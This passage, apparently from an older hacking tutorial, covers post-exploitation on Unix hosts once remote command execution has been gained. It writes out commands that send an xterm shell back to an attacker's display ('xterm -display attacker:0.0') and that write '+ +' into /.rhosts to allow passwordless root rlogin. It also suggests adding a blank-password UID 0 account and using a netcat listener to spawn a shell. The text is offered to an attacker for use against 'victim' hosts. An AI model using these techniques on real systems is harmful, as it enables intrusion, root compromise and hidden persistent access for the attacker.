Unix

If you have found some way to execute a command on a Unix box, but there's
no port 23 open - don't despair - you could try to export an xtermto your
box (assuming that you are running an X-server, and you do not block
incoming traffic on port 6000).
> xhost +victim
> your_exploit victim "/usr/X11R6/bin/xterm -display attacker:0.0&"
The above-mentioned command will export an xtermto your server (provided
that xtermis located in /usr/X11R6/bin).
Say you want to rloginto the host, and want to modify the relevant files to
be able to rloginto the host:
> your_exploit victim "echo + + >> /.rhosts"
> rlogin -l root victim
The possibilities are endless. You might want to add a UID 0, GID 0user to
the password file, with a blank password, then telnet and become root. Once
you can execute a command on a UNIX host there should be no reason to be
able to compromise the host.
We are assuming that the command is executed with "root" rights. If this is
not the case, things can get slightly more difficult. Keep in mind that
normal users cannot have processes that listens on ports lower than 1024. If
you plan to get a shell spawning netcatmake sure it listens on a port
higher than 1024.